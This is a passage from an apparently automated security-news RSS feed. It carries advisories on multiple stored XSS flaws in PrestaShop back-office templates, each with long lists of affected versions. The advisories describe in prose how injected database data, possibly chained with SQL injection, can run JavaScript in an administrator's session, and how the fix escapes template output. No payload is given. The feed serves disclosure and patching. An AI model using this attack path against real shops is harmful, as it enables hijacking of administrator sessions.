            <li>PrestaShop 1.6.0.1 alpha 1</li>
        
            <li>PrestaShop 1.6.0.2</li>
        
            <li>PrestaShop 1.6.0.2 alpha 2</li>
        
            <li>PrestaShop 1.6.0.3</li>
        
            <li>PrestaShop 1.6.0.3 beta 1</li>
        
            <li>PrestaShop 1.6.0.4</li>
        
            <li>PrestaShop 1.6.0.4 RC1</li>
        
            <li>PrestaShop 1.6.0.5</li>
        
            <li>PrestaShop 1.6.0.6</li>
        
            <li>PrestaShop 1.6.0.7</li>
        
            <li>PrestaShop 1.6.0.8</li>
        
            <li>PrestaShop 1.6.0.9</li>
        
            <li>PrestaShop 1.6.0.10</li>
        
            <li>PrestaShop 1.6.0.11</li>
        
            <li>PrestaShop 1.6.0.12</li>
        
            <li>PrestaShop 1.6.0.13</li>
        
            <li>PrestaShop 1.6.0.14</li>
        
            <li>PrestaShop 1.6.1.0</li>
        
            <li>PrestaShop 1.6.1.0 RC4</li>
        
            <li>PrestaShop 1.6.1.0 RC5</li>
        
            <li>PrestaShop 1.6.1.1</li>
        
            <li>PrestaShop 1.6.1.1 RC1</li>
        
            <li>PrestaShop 1.6.1.1 RC2</li>
        
            <li>PrestaShop 1.6.1.2</li>
        
            <li>PrestaShop 1.6.1.2 RC1</li>
        
            <li>PrestaShop 1.6.1.2 RC2</li>
        
            <li>PrestaShop 1.6.1.2 RC3</li>
        
            <li>PrestaShop 1.6.1.2 RC4</li>
        
            <li>PrestaShop 1.6.1.3</li>
        
            <li>PrestaShop 1.6.1.3 RC1</li>
        
            <li>PrestaShop 1.6.1.4</li>
        
            <li>PrestaShop 1.6.1.5</li>
        
            <li>PrestaShop 1.6.1.6</li>
        
            <li>PrestaShop 1.6.1.7</li>
        
            <li>PrestaShop 1.6.1.8</li>
        
            <li>PrestaShop 1.6.1.9</li>
        
            <li>PrestaShop 1.6.1.10</li>
        
            <li>PrestaShop 1.6.1.11</li>
        
            <li>PrestaShop 1.6.1.11 beta 1</li>
        
            <li>PrestaShop 1.6.1.11-beta.1.0</li>
        
            <li>PrestaShop 1.6.1.12</li>
        
            <li>PrestaShop 1.6.1.13</li>
        
            <li>PrestaShop 1.6.1.14</li>
        
            <li>PrestaShop 1.6.1.15</li>
        
            <li>PrestaShop 1.6.1.16</li>
        
            <li>PrestaShop 1.6.1.17</li>
        
            <li>PrestaShop 1.6.1.18</li>
        
            <li>PrestaShop 1.6.1.19</li>
        
            <li>PrestaShop 1.6.1.20</li>
        
            <li>PrestaShop 1.6.1.21</li>
        
            <li>PrestaShop 1.6.1.22</li>
        
            <li>PrestaShop 1.6.1.23</li>
        
            <li>PrestaShop 1.6.1.24</li>
        
            <li>PrestaShop 1.7.0.0</li>
        
            <li>PrestaShop 1.7.0.0 alpha3</li>
        
            <li>PrestaShop 1.7.0.0 alpha4</li>
        
            <li>PrestaShop 1.7.0.0 beta1</li>
        
            <li>PrestaShop 1.7.0.0 beta2</li>
        
            <li>PrestaShop 1.7.0.0 beta3</li>
        
            <li>PrestaShop 1.7.0.0 RC0</li>
        
            <li>PrestaShop 1.7.0.0 RC1</li>
        
            <li>PrestaShop 1.7.0.0 RC2</li>
        
            <li>PrestaShop 1.7.0.0 RC3</li>
        
            <li>PrestaShop 1.7.0.1</li>
        
            <li>PrestaShop 1.7.0.2</li>
        
            <li>PrestaShop 1.7.0.3</li>
        
            <li>PrestaShop 1.7.0.4</li>
        
            <li>PrestaShop 1.7.0.5</li>
        
            <li>PrestaShop 1.7.0.6</li>
        
            <li>PrestaShop 1.7.1.0</li>
        
            <li>PrestaShop 1.7.1.0 beta1</li>
        
            <li>PrestaShop 1.7.1.1</li>
        
            <li>PrestaShop 1.7.1.2</li>
        
            <li>PrestaShop 1.7.2.0</li>
        
            <li>PrestaShop 1.7.2.0 RC 1</li>
        
            <li>PrestaShop 1.7.2.0-RC.1.0</li>
        
            <li>PrestaShop 1.7.2.1</li>
        
            <li>PrestaShop 1.7.2.2</li>
        
            <li>PrestaShop 1.7.2.3</li>
        
            <li>PrestaShop 1.7.2.4</li>
        
            <li>PrestaShop 1.7.2.5</li>
        
            <li>PrestaShop 1.7.3.0</li>
        
            <li>PrestaShop 1.7.3.0 beta 1</li>
        
            <li>PrestaShop 1.7.3.0 RC 1</li>
        
            <li>PrestaShop 1.7.3.1</li>
        
            <li>PrestaShop 1.7.3.2</li>
        
            <li>PrestaShop 1.7.3.3</li>
        
            <li>PrestaShop 1.7.3.4</li>
        
            <li>PrestaShop 1.7.4.0</li>
        
            <li>PrestaShop 1.7.4.0 beta 1</li>
        
            <li>PrestaShop 1.7.4.1</li>
        
            <li>PrestaShop 1.7.4.2</li>
        
            <li>PrestaShop 1.7.4.3</li>
        
            <li>PrestaShop 1.7.4.4</li>
        
            <li>PrestaShop 1.7.5.0</li>
        
            <li>PrestaShop 1.7.5.0 beta 1</li>
        
            <li>PrestaShop 1.7.5.0 RC 1</li>
        
            <li>PrestaShop 1.7.5.0-beta.1</li>
        
            <li>PrestaShop 1.7.5.0-RC.1</li>
        
            <li>PrestaShop 1.7.5.1</li>
        
            <li>PrestaShop 1.7.5.2</li>
        
            <li>PrestaShop 1.7.6.0</li>
        
            <li>PrestaShop 1.7.6.0 beta 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 2</li>
        
            <li>PrestaShop 1.7.6.0-beta.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.2</li>
        
            <li>PrestaShop 1.7.6.1</li>
        
            <li>PrestaShop 1.7.6.2</li>
        
            <li>PrestaShop 1.7.6.3</li>
        
            <li>PrestaShop 1.7.6.4</li>
        
            <li>PrestaShop 1.7.6.4  1</li>
        
            <li>PrestaShop 1.7.6.5</li>
        
            <li>PrestaShop 1.7.6.5  1</li>
        
            <li>PrestaShop 1.7.6.6</li>
        
            <li>PrestaShop 1.7.6.7</li>
        
            <li>PrestaShop 1.7.6.8</li>
        
            <li>PrestaShop 1.7.6.9</li>
        
            <li>PrestaShop 1.7.7.0</li>
        
            <li>PrestaShop 1.7.7.0 beta 1</li>
        
            <li>PrestaShop 1.7.7.0 beta 2</li>
        
            <li>PrestaShop 1.7.7.0 RC 1</li>
        
            <li>PrestaShop 1.7.7.0-beta.1</li>
        
            <li>PrestaShop 1.7.7.0-beta.2</li>
        
            <li>PrestaShop 1.7.7.0-RC.1</li>
        
            <li>PrestaShop 1.7.7.1</li>
        
            <li>PrestaShop 1.7.7.2</li>
        
            <li>PrestaShop 1.7.7.3</li>
        
            <li>PrestaShop 1.7.7.4</li>
        
            <li>PrestaShop 1.7.7.5</li>
        
            <li>PrestaShop 1.7.7.6</li>
        
            <li>PrestaShop 1.7.7.7</li>
        
            <li>PrestaShop 1.7.7.8</li>
        
            <li>PrestaShop 1.7.7.8  1</li>
        
            <li>PrestaShop 1.7.8.0</li>
        
            <li>PrestaShop 1.7.8.0 beta 1</li>
        
            <li>PrestaShop 1.7.8.0  1</li>
        
            <li>PrestaShop 1.7.8.0 RC 1</li>
        
            <li>PrestaShop 1.7.8.0-beta.1</li>
        
            <li>PrestaShop 1.7.8.0-RC.1</li>
        
            <li>PrestaShop 1.7.8.1</li>
        
            <li>PrestaShop 1.7.8.2</li>
        
            <li>PrestaShop 1.7.8.2  1</li>
        
            <li>PrestaShop 1.7.8.3</li>
        
            <li>PrestaShop 1.7.8.4</li>
        
            <li>PrestaShop 1.7.8.5</li>
        
            <li>PrestaShop 1.7.8.6</li>
        
            <li>PrestaShop 1.7.8.7</li>
        
            <li>PrestaShop 1.7.8.7  1</li>
        
            <li>PrestaShop 1.7.8.8</li>
        
            <li>PrestaShop 1.7.8.9</li>
        
            <li>PrestaShop 1.7.8.10</li>
        
            <li>PrestaShop 1.7.8.11</li>
        
            <li>PrestaShop 8.0.0</li>
        
            <li>PrestaShop 8.0.1</li>
        
            <li>PrestaShop 8.0.2</li>
        
            <li>PrestaShop 8.0.3</li>
        
            <li>PrestaShop 8.0.4</li>
        
            <li>PrestaShop 8.0.5</li>
        
            <li>PrestaShop 8.1.0</li>
        
            <li>PrestaShop 8.1.1</li>
        
            <li>PrestaShop 8.1.2</li>
        
            <li>PrestaShop 8.1.3</li>
        
            <li>PrestaShop 8.1.4</li>
        
            <li>PrestaShop 8.1.5</li>
        
            <li>PrestaShop 8.1.6</li>
        
            <li>PrestaShop 8.1.7</li>
        
            <li>PrestaShop 8.2.0</li>
        
            <li>PrestaShop 8.2.1</li>
        
            <li>PrestaShop 8.2.2</li>
        
            <li>PrestaShop 8.2.3</li>
        
            <li>PrestaShop 8.2.4</li>
        
            <li>PrestaShop 9.0.0</li>
        
            <li>PrestaShop 9.0.0-1.0-RC.1</li>
        
            <li>PrestaShop 9.0.1</li>
        
            <li>PrestaShop 9.0.1-1.0</li>
        
            <li>PrestaShop 9.0.2</li>
        
            <li>PrestaShop 9.0.2-2.0</li>
        
            <li>PrestaShop 9.0.3</li>
        
            <li>PrestaShop 9.0.3-3.0</li>
        
            <li>PrestaShop 9.1.0-3.0-beta.1</li>
        
            <li>PrestaShop 9.1.0-4.0-RC.1</li>
        
    </ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple stored XSS via unprotected back-office template variables p4]]></title>
<description><![CDATA[An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
The ...]]></description>
<link>https://tsecurity.de/de/3652665/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652665/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p4/</guid>
<pubDate>Tue, 07 Jul 2026 21:55:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
<br>The fix escapes HTML output across dozens of legacy Smarty (.tpl) and modern Twig (.html.twig) back-office templates, including group names, category paths, customer thread and message content, shop names, translation modules, and the admin login page. It also hardens the translation pipeline by introducing a dedicated HTMLPurifier-backed Twig extension (RawPurifiedExtension), wired through TranslationService and the Symfony service container.</p>

    <p>This vulnerability affects the following application versions:</p>
    <ul>
        
            <li>PrestaShop 1.6.0.1</li>
        
            <li>PrestaShop 1.6.0.1 alpha 1</li>
        
            <li>PrestaShop 1.6.0.2</li>
        
            <li>PrestaShop 1.6.0.2 alpha 2</li>
        
            <li>PrestaShop 1.6.0.3</li>
        
            <li>PrestaShop 1.6.0.3 beta 1</li>
        
            <li>PrestaShop 1.6.0.4</li>
        
            <li>PrestaShop 1.6.0.4 RC1</li>
        
            <li>PrestaShop 1.6.0.5</li>
        
            <li>PrestaShop 1.6.0.6</li>
        
            <li>PrestaShop 1.6.0.7</li>
        
            <li>PrestaShop 1.6.0.8</li>
        
            <li>PrestaShop 1.6.0.9</li>
        
            <li>PrestaShop 1.6.0.10</li>
        
            <li>PrestaShop 1.6.0.11</li>
        
            <li>PrestaShop 1.6.0.12</li>
        
            <li>PrestaShop 1.6.0.13</li>
        
            <li>PrestaShop 1.6.0.14</li>
        
            <li>PrestaShop 1.6.1.0</li>
        
            <li>PrestaShop 1.6.1.0 RC4</li>
        
            <li>PrestaShop 1.6.1.0 RC5</li>
        
            <li>PrestaShop 1.6.1.1</li>
        
            <li>PrestaShop 1.6.1.1 RC1</li>
        
            <li>PrestaShop 1.6.1.1 RC2</li>
        
            <li>PrestaShop 1.6.1.2</li>
        
            <li>PrestaShop 1.6.1.2 RC1</li>
        
            <li>PrestaShop 1.6.1.2 RC2</li>
        
            <li>PrestaShop 1.6.1.2 RC3</li>
        
            <li>PrestaShop 1.6.1.2 RC4</li>
        
            <li>PrestaShop 1.6.1.3</li>
        
            <li>PrestaShop 1.6.1.3 RC1</li>
        
            <li>PrestaShop 1.6.1.4</li>
        
            <li>PrestaShop 1.6.1.5</li>
        
            <li>PrestaShop 1.6.1.6</li>
        
            <li>PrestaShop 1.6.1.7</li>
        
            <li>PrestaShop 1.6.1.8</li>
        
            <li>PrestaShop 1.6.1.9</li>
        
            <li>PrestaShop 1.6.1.10</li>
        
            <li>PrestaShop 1.6.1.11</li>
        
            <li>PrestaShop 1.6.1.11 beta 1</li>
        
            <li>PrestaShop 1.6.1.11-beta.1.0</li>
        
            <li>PrestaShop 1.6.1.12</li>
        
            <li>PrestaShop 1.6.1.13</li>
        
            <li>PrestaShop 1.6.1.14</li>
        
            <li>PrestaShop 1.6.1.15</li>
        
            <li>PrestaShop 1.6.1.16</li>
        
            <li>PrestaShop 1.6.1.17</li>
        
            <li>PrestaShop 1.6.1.18</li>
        
            <li>PrestaShop 1.6.1.19</li>
        
            <li>PrestaShop 1.6.1.20</li>
        
            <li>PrestaShop 1.6.1.21</li>
        
            <li>PrestaShop 1.6.1.22</li>
        
            <li>PrestaShop 1.6.1.23</li>
        
            <li>PrestaShop 1.6.1.24</li>
        
            <li>PrestaShop 1.7.0.0</li>
        
            <li>PrestaShop 1.7.0.0 alpha3</li>
        
            <li>PrestaShop 1.7.0.0 alpha4</li>
        
            <li>PrestaShop 1.7.0.0 beta1</li>
        
            <li>PrestaShop 1.7.0.0 beta2</li>
        
            <li>PrestaShop 1.7.0.0 beta3</li>
        
            <li>PrestaShop 1.7.0.0 RC0</li>
        
            <li>PrestaShop 1.7.0.0 RC1</li>
        
            <li>PrestaShop 1.7.0.0 RC2</li>
        
            <li>PrestaShop 1.7.0.0 RC3</li>
        
            <li>PrestaShop 1.7.0.1</li>
        
            <li>PrestaShop 1.7.0.2</li>
        
            <li>PrestaShop 1.7.0.3</li>
        
            <li>PrestaShop 1.7.0.4</li>
        
            <li>PrestaShop 1.7.0.5</li>
        
            <li>PrestaShop 1.7.0.6</li>
        
            <li>PrestaShop 1.7.1.0</li>
        
            <li>PrestaShop 1.7.1.0 beta1</li>
        
            <li>PrestaShop 1.7.1.1</li>
        
            <li>PrestaShop 1.7.1.2</li>
        
            <li>PrestaShop 1.7.2.0</li>
        
            <li>PrestaShop 1.7.2.0 RC 1</li>
        
            <li>PrestaShop 1.7.2.0-RC.1.0</li>
        
            <li>PrestaShop 1.7.2.1</li>
        
            <li>PrestaShop 1.7.2.2</li>
        
            <li>PrestaShop 1.7.2.3</li>
        
            <li>PrestaShop 1.7.2.4</li>
        
            <li>PrestaShop 1.7.2.5</li>
        
            <li>PrestaShop 1.7.3.0</li>
        
            <li>PrestaShop 1.7.3.0 beta 1</li>
        
            <li>PrestaShop 1.7.3.0 RC 1</li>
        
            <li>PrestaShop 1.7.3.1</li>
        
            <li>PrestaShop 1.7.3.2</li>
        
            <li>PrestaShop 1.7.3.3</li>
        
            <li>PrestaShop 1.7.3.4</li>
        
            <li>PrestaShop 1.7.4.0</li>
        
            <li>PrestaShop 1.7.4.0 beta 1</li>
        
            <li>PrestaShop 1.7.4.1</li>
        
            <li>PrestaShop 1.7.4.2</li>
        
            <li>PrestaShop 1.7.4.3</li>
        
            <li>PrestaShop 1.7.4.4</li>
        
            <li>PrestaShop 1.7.5.0</li>
        
            <li>PrestaShop 1.7.5.0 beta 1</li>
        
            <li>PrestaShop 1.7.5.0 RC 1</li>
        
            <li>PrestaShop 1.7.5.0-beta.1</li>
        
            <li>PrestaShop 1.7.5.0-RC.1</li>
        
            <li>PrestaShop 1.7.5.1</li>
        
            <li>PrestaShop 1.7.5.2</li>
        
            <li>PrestaShop 1.7.6.0</li>
        
            <li>PrestaShop 1.7.6.0 beta 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 2</li>
        
            <li>PrestaShop 1.7.6.0-beta.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.2</li>
        
            <li>PrestaShop 1.7.6.1</li>
        
            <li>PrestaShop 1.7.6.2</li>
        
            <li>PrestaShop 1.7.6.3</li>
        
            <li>PrestaShop 1.7.6.4</li>
        
            <li>PrestaShop 1.7.6.4  1</li>
        
            <li>PrestaShop 1.7.6.5</li>
        
            <li>PrestaShop 1.7.6.5  1</li>
        
            <li>PrestaShop 1.7.6.6</li>
        
            <li>PrestaShop 1.7.6.7</li>
        
            <li>PrestaShop 1.7.6.8</li>
        
            <li>PrestaShop 1.7.6.9</li>
        
            <li>PrestaShop 1.7.7.0</li>
        
            <li>PrestaShop 1.7.7.0 beta 1</li>
        
            <li>PrestaShop 1.7.7.0 beta 2</li>
        
            <li>PrestaShop 1.7.7.0 RC 1</li>
        
            <li>PrestaShop 1.7.7.0-beta.1</li>
        
            <li>PrestaShop 1.7.7.0-beta.2</li>
        
            <li>PrestaShop 1.7.7.0-RC.1</li>
        
            <li>PrestaShop 1.7.7.1</li>
        
            <li>PrestaShop 1.7.7.2</li>
        
            <li>PrestaShop 1.7.7.3</li>
        
            <li>PrestaShop 1.7.7.4</li>
        
            <li>PrestaShop 1.7.7.5</li>
        
            <li>PrestaShop 1.7.7.6</li>
        
            <li>PrestaShop 1.7.7.7</li>
        
            <li>PrestaShop 1.7.7.8</li>
        
            <li>PrestaShop 1.7.7.8  1</li>
        
            <li>PrestaShop 1.7.8.0</li>
        
            <li>PrestaShop 1.7.8.0 beta 1</li>
        
            <li>PrestaShop 1.7.8.0  1</li>
        
            <li>PrestaShop 1.7.8.0 RC 1</li>
        
            <li>PrestaShop 1.7.8.0-beta.1</li>
        
            <li>PrestaShop 1.7.8.0-RC.1</li>
        
            <li>PrestaShop 1.7.8.1</li>
        
            <li>PrestaShop 1.7.8.2</li>
        
            <li>PrestaShop 1.7.8.2  1</li>
        
            <li>PrestaShop 1.7.8.3</li>
        
            <li>PrestaShop 1.7.8.4</li>
        
            <li>PrestaShop 1.7.8.5</li>
        
            <li>PrestaShop 1.7.8.6</li>
        
            <li>PrestaShop 1.7.8.7</li>
        
            <li>PrestaShop 1.7.8.7  1</li>
        
            <li>PrestaShop 1.7.8.8</li>
        
            <li>PrestaShop 1.7.8.9</li>
        
            <li>PrestaShop 1.7.8.10</li>
        
            <li>PrestaShop 1.7.8.11</li>
        
            <li>PrestaShop 8.0.0</li>
        
            <li>PrestaShop 8.0.1</li>
        
            <li>PrestaShop 8.0.2</li>
        
            <li>PrestaShop 8.0.3</li>
        
            <li>PrestaShop 8.0.4</li>
        
            <li>PrestaShop 8.0.5</li>
        
            <li>PrestaShop 8.1.0</li>
        
            <li>PrestaShop 8.1.1</li>
        
            <li>PrestaShop 8.1.2</li>
        
            <li>PrestaShop 8.1.3</li>
        
            <li>PrestaShop 8.1.4</li>
        
            <li>PrestaShop 8.1.5</li>
        
            <li>PrestaShop 8.1.6</li>
        
            <li>PrestaShop 8.1.7</li>
        
            <li>PrestaShop 8.2.0</li>
        
            <li>PrestaShop 8.2.1</li>
        
            <li>PrestaShop 8.2.2</li>
        
            <li>PrestaShop 8.2.3</li>
        
            <li>PrestaShop 8.2.4</li>
        
            <li>PrestaShop 8.2.5</li>
        
            <li>PrestaShop 8.2.6</li>
        
            <li>PrestaShop 8.2.7</li>
        
            <li>PrestaShop 9.0.0</li>
        
            <li>PrestaShop 9.0.0-1.0-RC.1</li>
        
            <li>PrestaShop 9.0.1</li>
        
            <li>PrestaShop 9.0.1-1.0</li>
        
            <li>PrestaShop 9.0.2</li>
        
            <li>PrestaShop 9.0.2-2.0</li>
        
            <li>PrestaShop 9.0.3</li>
        
            <li>PrestaShop 9.0.3-3.0</li>
        
            <li>PrestaShop 9.1.0</li>
        
            <li>PrestaShop 9.1.0-3.0-beta.1</li>
        
            <li>PrestaShop 9.1.0-4.0</li>
        
            <li>PrestaShop 9.1.0-4.0-RC.1</li>
        
            <li>PrestaShop 9.1.1</li>
        
            <li>PrestaShop 9.1.2</li>
        
            <li>PrestaShop 9.1.3</li>
        
            <li>PrestaShop 9.1.3-5.0</li>
        
            <li>PrestaShop 9.1.4</li>
        
            <li>PrestaShop 9.1.4-5.0</li>
        
    </ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple stored XSS via unprotected back-office template variables p5]]></title>
<description><![CDATA[An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
The ...]]></description>
<link>https://tsecurity.de/de/3652664/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652664/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p5/</guid>
<pubDate>Tue, 07 Jul 2026 21:55:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
<br>The fix escapes HTML output across dozens of legacy Smarty (.tpl) and modern Twig (.html.twig) back-office templates, including group names, category paths, customer thread and message content, shop names, translation modules, and the admin login page. It also hardens the translation pipeline by introducing a dedicated HTMLPurifier-backed Twig extension (RawPurifiedExtension), wired through TranslationService and the Symfony service container.</p>

    <p>This vulnerability affects the following application versions:</p>
    <ul>
        
            <li>PrestaShop 1.6.0.1</li>
        
            <li>PrestaShop 1.6.0.1 alpha 1</li>
        
            <li>PrestaShop 1.6.0.2</li>
        
            <li>PrestaShop 1.6.0.2 alpha 2</li>
        
            <li>PrestaShop 1.6.0.3</li>
        
            <li>PrestaShop 1.6.0.3 beta 1</li>
        
            <li>PrestaShop 1.6.0.4</li>
        
            <li>PrestaShop 1.6.0.4 RC1</li>
        
            <li>PrestaShop 1.6.0.5</li>
        
            <li>PrestaShop 1.6.0.6</li>
        
            <li>PrestaShop 1.6.0.7</li>
        
            <li>PrestaShop 1.6.0.8</li>
        
            <li>PrestaShop 1.6.0.9</li>
        
            <li>PrestaShop 1.6.0.10</li>
        
            <li>PrestaShop 1.6.0.11</li>
        
            <li>PrestaShop 1.6.0.12</li>
        
            <li>PrestaShop 1.6.0.13</li>
        
            <li>PrestaShop 1.6.0.14</li>
        
            <li>PrestaShop 1.6.1.0</li>
        
            <li>PrestaShop 1.6.1.0 RC4</li>
        
            <li>PrestaShop 1.6.1.0 RC5</li>
        
            <li>PrestaShop 1.6.1.1</li>
        
            <li>PrestaShop 1.6.1.1 RC1</li>
        
            <li>PrestaShop 1.6.1.1 RC2</li>
        
            <li>PrestaShop 1.6.1.2</li>
        
            <li>PrestaShop 1.6.1.2 RC1</li>
        
            <li>PrestaShop 1.6.1.2 RC2</li>
        
            <li>PrestaShop 1.6.1.2 RC3</li>
        
            <li>PrestaShop 1.6.1.2 RC4</li>
        
            <li>PrestaShop 1.6.1.3</li>
        
            <li>PrestaShop 1.6.1.3 RC1</li>
        
            <li>PrestaShop 1.6.1.4</li>
        
            <li>PrestaShop 1.6.1.5</li>
        
            <li>PrestaShop 1.6.1.6</li>
        
            <li>PrestaShop 1.6.1.7</li>
        
            <li>PrestaShop 1.6.1.8</li>
        
            <li>PrestaShop 1.6.1.9</li>
        
            <li>PrestaShop 1.6.1.10</li>
        
            <li>PrestaShop 1.6.1.11</li>
        
            <li>PrestaShop 1.6.1.11 beta 1</li>
        
            <li>PrestaShop 1.6.1.11-beta.1.0</li>
        
            <li>PrestaShop 1.6.1.12</li>
        
            <li>PrestaShop 1.6.1.13</li>
        
            <li>PrestaShop 1.6.1.14</li>
        
            <li>PrestaShop 1.6.1.15</li>
        
            <li>PrestaShop 1.6.1.16</li>
        
            <li>PrestaShop 1.6.1.17</li>
        
            <li>PrestaShop 1.6.1.18</li>
        
            <li>PrestaShop 1.6.1.19</li>
        
            <li>PrestaShop 1.6.1.20</li>
        
            <li>PrestaShop 1.6.1.21</li>
        
            <li>PrestaShop 1.6.1.22</li>
        
            <li>PrestaShop 1.6.1.23</li>
        
            <li>PrestaShop 1.6.1.24</li>
        
            <li>PrestaShop 1.7.0.0</li>
        
            <li>PrestaShop 1.7.0.0 alpha3</li>
        
            <li>PrestaShop 1.7.0.0 alpha4</li>
        
            <li>PrestaShop 1.7.0.0 beta1</li>
        
            <li>PrestaShop 1.7.0.0 beta2</li>
        
            <li>PrestaShop 1.7.0.0 beta3</li>
        
            <li>PrestaShop 1.7.0.0 RC0</li>
        
            <li>PrestaShop 1.7.0.0 RC1</li>
        
            <li>PrestaShop 1.7.0.0 RC2</li>
        
            <li>PrestaShop 1.7.0.0 RC3</li>
        
            <li>PrestaShop 1.7.0.1</li>
        
            <li>PrestaShop 1.7.0.2</li>
        
            <li>PrestaShop 1.7.0.3</li>
        
            <li>PrestaShop 1.7.0.4</li>
        
            <li>PrestaShop 1.7.0.5</li>
        
            <li>PrestaShop 1.7.0.6</li>
        
            <li>PrestaShop 1.7.1.0</li>
        
            <li>PrestaShop 1.7.1.0 beta1</li>
        
            <li>PrestaShop 1.7.1.1</li>
        
            <li>PrestaShop 1.7.1.2</li>
        
            <li>PrestaShop 1.7.2.0</li>
        
            <li>PrestaShop 1.7.2.0 RC 1</li>
        
            <li>PrestaShop 1.7.2.0-RC.1.0</li>
        
            <li>PrestaShop 1.7.2.1</li>
        
            <li>PrestaShop 1.7.2.2</li>
        
            <li>PrestaShop 1.7.2.3</li>
        
            <li>PrestaShop 1.7.2.4</li>
        
            <li>PrestaShop 1.7.2.5</li>
        
            <li>PrestaShop 1.7.3.0</li>
        
            <li>PrestaShop 1.7.3.0 beta 1</li>
        
            <li>PrestaShop 1.7.3.0 RC 1</li>
        
            <li>PrestaShop 1.7.3.1</li>
        
            <li>PrestaShop 1.7.3.2</li>
        
            <li>PrestaShop 1.7.3.3</li>
        
            <li>PrestaShop 1.7.3.4</li>
        
            <li>PrestaShop 1.7.4.0</li>
        
            <li>PrestaShop 1.7.4.0 beta 1</li>
        
            <li>PrestaShop 1.7.4.1</li>
        
            <li>PrestaShop 1.7.4.2</li>
        
            <li>PrestaShop 1.7.4.3</li>
        
            <li>PrestaShop 1.7.4.4</li>
        
            <li>PrestaShop 1.7.5.0</li>
        
            <li>PrestaShop 1.7.5.0 beta 1</li>
        
            <li>PrestaShop 1.7.5.0 RC 1</li>
        
            <li>PrestaShop 1.7.5.0-beta.1</li>
        
            <li>PrestaShop 1.7.5.0-RC.1</li>
        
            <li>PrestaShop 1.7.5.1</li>
        
            <li>PrestaShop 1.7.5.2</li>
        
            <li>PrestaShop 1.7.6.0</li>
        
            <li>PrestaShop 1.7.6.0 beta 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 2</li>
        
            <li>PrestaShop 1.7.6.0-beta.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.2</li>
        
            <li>PrestaShop 1.7.6.1</li>
        
            <li>PrestaShop 1.7.6.2</li>
        
            <li>PrestaShop 1.7.6.3</li>
        
            <li>PrestaShop 1.7.6.4</li>
        
            <li>PrestaShop 1.7.6.4  1</li>
        
            <li>PrestaShop 1.7.6.5</li>
        
            <li>PrestaShop 1.7.6.5  1</li>
        
            <li>PrestaShop 1.7.6.6</li>
        
            <li>PrestaShop 1.7.6.7</li>
        
            <li>PrestaShop 1.7.6.8</li>
        
            <li>PrestaShop 1.7.6.9</li>
        
            <li>PrestaShop 1.7.7.0</li>
        
            <li>PrestaShop 1.7.7.0 beta 1</li>
        
            <li>PrestaShop 1.7.7.0 beta 2</li>
        
            <li>PrestaShop 1.7.7.0 RC 1</li>
        
            <li>PrestaShop 1.7.7.0-beta.1</li>
        
            <li>PrestaShop 1.7.7.0-beta.2</li>
        
            <li>PrestaShop 1.7.7.0-RC.1</li>
        
            <li>PrestaShop 1.7.7.1</li>
        
            <li>PrestaShop 1.7.7.2</li>
        
            <li>PrestaShop 1.7.7.3</li>
        
            <li>PrestaShop 1.7.7.4</li>
        
            <li>PrestaShop 1.7.7.5</li>
        
            <li>PrestaShop 1.7.7.6</li>
        
            <li>PrestaShop 1.7.7.7</li>
        
            <li>PrestaShop 1.7.7.8</li>
        
            <li>PrestaShop 1.7.7.8  1</li>
        
            <li>PrestaShop 1.7.8.0</li>
        
            <li>PrestaShop 1.7.8.0 beta 1</li>
        
            <li>PrestaShop 1.7.8.0  1</li>
        
            <li>PrestaShop 1.7.8.0 RC 1</li>
        
            <li>PrestaShop 1.7.8.0-beta.1</li>
        
            <li>PrestaShop 1.7.8.0-RC.1</li>
        
            <li>PrestaShop 1.7.8.1</li>
        
            <li>PrestaShop 1.7.8.2</li>
        
            <li>PrestaShop 1.7.8.2  1</li>
        
            <li>PrestaShop 1.7.8.3</li>
        
            <li>PrestaShop 1.7.8.4</li>
        
            <li>PrestaShop 1.7.8.5</li>
        
            <li>PrestaShop 1.7.8.6</li>
        
            <li>PrestaShop 1.7.8.7</li>
        
            <li>PrestaShop 1.7.8.7  1</li>
        
            <li>PrestaShop 1.7.8.8</li>
        
            <li>PrestaShop 1.7.8.9</li>
        
            <li>PrestaShop 1.7.8.10</li>
        
            <li>PrestaShop 1.7.8.11</li>
        
            <li>PrestaShop 8.0.0</li>
        
            <li>PrestaShop 8.0.1</li>
        
            <li>PrestaShop 8.0.2</li>
        
            <li>PrestaShop 8.0.3</li>
        
            <li>PrestaShop 8.0.4</li>
        
            <li>PrestaShop 8.0.5</li>
        
            <li>PrestaShop 8.1.0</li>
        
            <li>PrestaShop 8.1.1</li>
        
